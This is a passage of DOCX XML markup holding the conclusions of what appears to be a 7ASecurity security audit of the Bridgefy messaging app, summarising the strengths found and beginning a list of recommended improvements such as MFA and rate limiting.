          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>human </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>error.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1440" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="276" w:lineRule="auto" w:before="0" w:after="0"/>
        <w:ind w:left="1440" w:right="370" w:hanging="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>The mobile and web apps offer relatively little attack surface, which drastically reduces chances for security vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1440" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="276" w:lineRule="auto" w:before="0" w:after="0"/>
        <w:ind w:left="1440" w:right="364" w:hanging="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>7ASecurity was unable to identify any issue in the initialization or usage of the Signal Protocol, which Bridgefy leverages to protect user messages. This is an excellent choice given the security track record of this package</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>189</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>. Additionally, the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="80"/>
          <w:sz w:val="22"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>project</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:sz w:val="22"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>leaves</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:sz w:val="22"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:sz w:val="22"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>impression</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:sz w:val="22"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>of</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:sz w:val="22"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:sz w:val="22"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>firm</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:sz w:val="22"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>design,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:sz w:val="22"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>with</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:sz w:val="22"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>regards</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:sz w:val="22"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:sz w:val="22"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>safe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:sz w:val="22"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>peer-to-peer messaging in the offline environment.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1440" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="276" w:lineRule="auto" w:before="0" w:after="0"/>
        <w:ind w:left="1440" w:right="366" w:hanging="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Another good design decision is that Bridgefy generally avoids storing sensitive data where possible. For example, when SDK users register, credit card details are sent directly to Stripe.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1440" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="276" w:lineRule="auto" w:before="0" w:after="0"/>
        <w:ind w:left="1440" w:right="368" w:hanging="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>The mobile applications were found to be safe from </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Denial-of-Service </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>(DoS), redirect vulnerabilities via Activity and Deeplink invocations, as well as Android Backup leaks. Additionally, no evidence could</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>be</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>found</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>suggest</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>that</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>either</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>the mobile or web components leak sensitive data or tokens to third parties.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1440" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="276" w:lineRule="auto" w:before="0" w:after="0"/>
        <w:ind w:left="1440" w:right="368" w:hanging="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Overall, the solution was found to be robust against many traditional web application security attack vectors. For example, no Command Injection, SQLi, XSS, CSRF, SSRF, or RCE issues could be identified during this assignment.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1440" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="276" w:lineRule="auto" w:before="0" w:after="0"/>
        <w:ind w:left="1440" w:right="367" w:hanging="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>No significant authentication or authorization issues could be identified during</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>this exercise. More broadly, access control seems to be generally well implemented, whereby users cannot access, modify or delete data from other users and user roles. Furthermore, the Session implementation was resistant against manipulation and cracking attempts.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1439" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="0" w:after="0"/>
        <w:ind w:left="1439" w:right="0" w:hanging="359"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>The</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Google</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>keys</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>in</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>use</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>were</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>found</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>be</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>correctly</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>configured</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>restricted.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1440" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="276" w:lineRule="auto" w:before="38" w:after="0"/>
        <w:ind w:left="1440" w:right="368" w:hanging="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>The code audit performed on all components provided a positive impression whereby</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>source</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>code</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>appears</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>be</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>professionally</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>written,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>appropriately</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="48"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="0" distR="0" allowOverlap="1" layoutInCell="1" locked="0" behindDoc="1" simplePos="0" relativeHeight="487636480">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>914400</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>192105</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1828800" cy="1270"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="124" name="Graphic 124"/>
                <wp:cNvGraphicFramePr>
                  <a:graphicFrameLocks/>
                </wp:cNvGraphicFramePr>
                <a:graphic>
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvPr id="124" name="Graphic 124"/>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5.126416pt;width:144pt;height:.1pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:paragraph;z-index:-15680000;mso-wrap-distance-left:0;mso-wrap-distance-right:0" id="docshape93" coordorigin="1440,303" coordsize="2880,0" path="m1440,303l4320,303e" filled="false" stroked="true" strokeweight=".75pt" strokecolor="#000000">
                <v:path arrowok="t"/>
                <v:stroke dashstyle="solid"/>
                <w10:wrap type="topAndBottom"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="100"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>189</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId286">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>https://eprint.iacr.org/2016/1013</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BodyText"/>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>commented</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>without</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>much</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>technical</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>debt.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="76"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="363"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The security of the Bridgefy solution will improve substantially with a focus on the following areas:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1440" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="276" w:lineRule="auto" w:before="0" w:after="0"/>
        <w:ind w:left="1440" w:right="365" w:hanging="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Missing</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-8"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>MFA,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-8"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Password</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-8"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Policy,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-8"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>User</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-8"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Lockout,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-8"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Rate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-8"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Limiting,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-8"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>IP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-8"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>whitelisting: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Some of the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>most</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>significant</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>findings</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>identified</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>during</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>iteration</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
